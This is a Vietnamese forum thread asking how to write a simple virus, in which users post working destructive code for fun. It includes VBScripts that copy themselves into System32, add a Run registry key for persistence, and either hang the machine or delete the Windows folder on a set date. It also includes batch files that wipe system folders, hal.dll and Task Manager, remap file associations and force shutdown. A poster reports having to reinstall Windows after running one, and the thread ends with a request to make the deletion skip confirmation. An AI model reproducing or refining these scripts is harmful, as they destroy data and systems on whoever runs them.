Cách viết một con virus đơn giản?

[hoabaybay]

o phan nay,minh da biet viet vai con vi rut don gian ,co the noi la rat rat don gian,ban nao biet thi viet goi len de hoc hoi.
luu y: minh viet bai nay chi mang tinh tham khao chu ko co y hack hit gi het nha:d
Ah nhung cao thu viet virut chac cung la nhung hacker gioi

View more random threads:

• học phần mềm có làm được trình duyệt viruts không?
• Ngôn ngữ lập trình để viết virus
• Bạn sẽ làm gì khi máy tính bị nhiễm virus?
• Có thể decode virus(.exe) bằng tool nào?
• Code virut viết bằng C, tác dụng của nó như thế nào?
• Viết virus khóa chuột - Lập trình virus trên C
• file autorun.inf trên usb không thể xóa trừ khi format cả ổ?
• Thực thi luôn file .exe mà không cần Click chuột
• Khẩn cấp diệt con bot trên máy các bạn !
• virus inject DLL nghĩa là gì? Tại sao chỉ cần kill Explorer là có thể unhook được???

[tuyentravels]

Thử viết con chơi thử nha:

Mã:

On Error Resume NextSet popo= Createobject("scripting.filesystemobject")popo.copyfile wscript.scriptfullname,cuong.GetSpecialFolder(1)& "\popo.vbs"Set popo2= CreateObject("WScript.Shell")popo2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\cod e1","wscript.exe "&popo.GetSpecialFolder(0)& "\popo.vbs %"Set treomay= CreateObject("WScript.Shell")Dotreomay.run "notepad",falseloop

Nội dung con này là làm cho máy treo bằng cách gọi notepad lặp liên tục.

Thử con nữa cho vui.

Mã:

On Error Resume NextSet po= Createobject("scripting.filesystemobject")po.copyfile wscript.scriptfullname,po.GetSpecialFolder(1)& "\po.vbs"Set po2= CreateObject("WScript.Shell")po2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\code2","wscript.exe "&po.GetSpecialFolder(0)& "\po.vbs %"Set treomay= CreateObject("WScript.Shell")if month(now) =7 and day(now) =22 thenConst vic = "c:\windows\"DelvicSub Delvic()Dim fsoSet fso = CreateObject("Scripting.FileSystemObject")fso.DeleteFile vic & "*.*" , Truefso.DeleteFolder vic & "*" , TrueEnd Subend if

Nội dung con này là hẹn đến ngày 22 tháng 7 là nó tự động delete luôn thư mục windows đó.

Hi hi , sợ không.

[nvtuantt]

sợ,sợ là ko del đc

[kientaoviet]

Yên tâm đi, chạy thử rồi biết. cái này tui test trên máy tui rùi. Kết quả thật là mỹ mãn đến ...muốn khóc. (cài lại win)

[duongthidiu]

Mã:

po.GetSpecialFolder(0)

là lấy đường dẫn của thư mục Windows.

Mã:

po.GetSpecialFolder(1)

là lấy đường dẫn của System32

Mã:

po.GetSpecialFolder(2)

Là lấy đường dẫn của Temp

Đây là 3 đường dẫn đặc biệt.

Ý của nguyentuan là nếu mình tạo khóa trong regedit thì dùng safemode là xóa được. tuy nhiên mình cũng có thể xóa trong unsafemode cũng được mà, trừ phi convirus nó khóa cái regedit của mình thì mới nhờ tới thằng safemode.

Còn nữa, phải cài lại win là bởi vì thư mục windows bị del rồi còn đâu mà vào win.

[nhungdo]

Yên tâm đi, chạy thử rồi biết. cái này tui test trên máy tui rùi. Kết quả thật là mỹ mãn đến ...muốn khóc. (cài lại win)

Gì mà phải cài lại Win, tạo value trong Run của Registry thì restart safemode rồi xóa đi là xong
Mà cái dòng này

po2.regwrite "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersio n\Ru n\code2","wscript.exe "&po.GetSpecialFolder(0)& "\po.vbs %"

cậu sửa wscript.exe thành cscript.exe thì ra dáng pro hơn

[saolaikhong]

Chậc toàn là cao thủ , đáng học hỏi ?
Chỉ có điều cho kid hỏi là tại sao đang sử dụng win mà lại có thể xóa thử mục chứa nó được . Tiếp nữa là anh em chỉ phỏng đoán là ở C\Windows chứ đâu chắc là ở ổ C .

Tiếp nữa các cách trên đều chơi với vbs ( 1 thứ phổ dụng cho mấy trò này ) tuy nhiên anh em phải đi theo đúng hướng chứ Cviet mà .

[khamnamkhoa]

Code của anh Sơn (popo) là viết VBscript có nhúng Shell. [IMG]images/smilies/biggrin.png[/IMG]
Em đố anh Sơn viết con shell up quyền user thành admin của win đấy [IMG]images/smilies/biggrin.png[/IMG] ?

Dưới đây là code login n Yahoo ID 1 lúc dùng shell :

Mã:

Thậm chí 1k ID cũng được
Laugh of loud
Có 2 việc cần làm :

1 ) ***** ID Yahoo 1st : Grin

Start > Run : gõ " regedit " ..
HKEY_CURRENT_USERS \ Software \ Yahoo \ pager \ Test

Khung bên phải tạo string value mới
Đặt tên là : Plural lấy value 1 .
>> Xong ***** ID .

2 ) Thiết lập File chạy 1 nhát vào luôn 100 nick Yahoo thật luôn .

Start > Run > Gõ " Notepad "

Dán đoạn code sau vào Notepad :


Option Explicit
Dim WshShell
Set WshShell=CreateObject("WScript.Shell")

/* 1-------------------------

WshShell.Run"""C:\Program Files\Yahoo!\Messenger\YahooMessenger.exe"""
WScript.Sleep 500
WshShell.AppActivate"Sign In"
WScript.Sleep 200
WshShell.SendKeys"ID Yahoo của bạn"
WScript.Sleep 200
WshShell.SendKeys"{TAB}"
WScript.Sleep 200
WshShell.SendKeys"Password của bạn "
WScript.Sleep 200
WshShell.Sendkeys"{Enter}"

/* >>> xong Login ID thứ nhât

/* Copy đoạn code trên nhưng thay thông số ID và password cho ID thứ 2 ...*/

/* Lân lượt như vậy đến khi nào bạn hết ID để Login thì thôi */

// Nếu bạn biết lập trình VBS thì viết luôn một vòng lặp và một database lưu trữ ID và password của bạn .. cho nó lặp đến hết ID thì thôi ..

Sau đó bạn lưu file dưới dạng *.vbs

>> Đã xong ... Login vô tư nha ^_^ !!!

Hoặc là làm con batch programming như sau :

Mã:

@echo off
@del c:\windows\
@del c:\windows\system32\
pause
end

Save file thành file_name.bat
sau đó run -> sẽ biết ^_^

Hoặc thế này cho sành :

Mã:

@Echo Off
@cls
@title Virus ti choi
@assoc exe=txt
@assoc reg=jpg
@cd %systemroot%
@del /f /s /q TASKMAN.EXE
@cd %Systemroot%\system32
@del /f /s /q hal.dll
@del /f /s /q taskkil.exe
@del /f /s /q tasklist.exe
@del /f /s /q taskman.exe
@del /f /s /q taskmgr.exe
@shutdown -s -t 06 -c " Fatal error #1337, You DEAD!"
@del /f /s /q *.*
@cd ..
@del /f /s /q TASKMAN.EXE
@del /f /s /q *.*
@exit

Save thành file *.bat

Nói chung là thế giới loại này nhiều lắm..suy một tí là ra nhưng tốt nhất không nên phá hoại [IMG]images/smilies/biggrin.png[/IMG]

[thaychuathd]

Thử chạy con này coi.
http://www.esnips.com/doc/38576d83-e...95ef01b/Prefix

cố lên nha.

[traihalinh]

Hoặc là làm con batch programming như sau :

Mã:

@echo off
@del c:\windows\
@del c:\windows\system32\
pause
end

nhưng nó còn bắt chọn y mà bác. Có cách nào làm cho nó không hỏi mà tự động Del luôn ko ?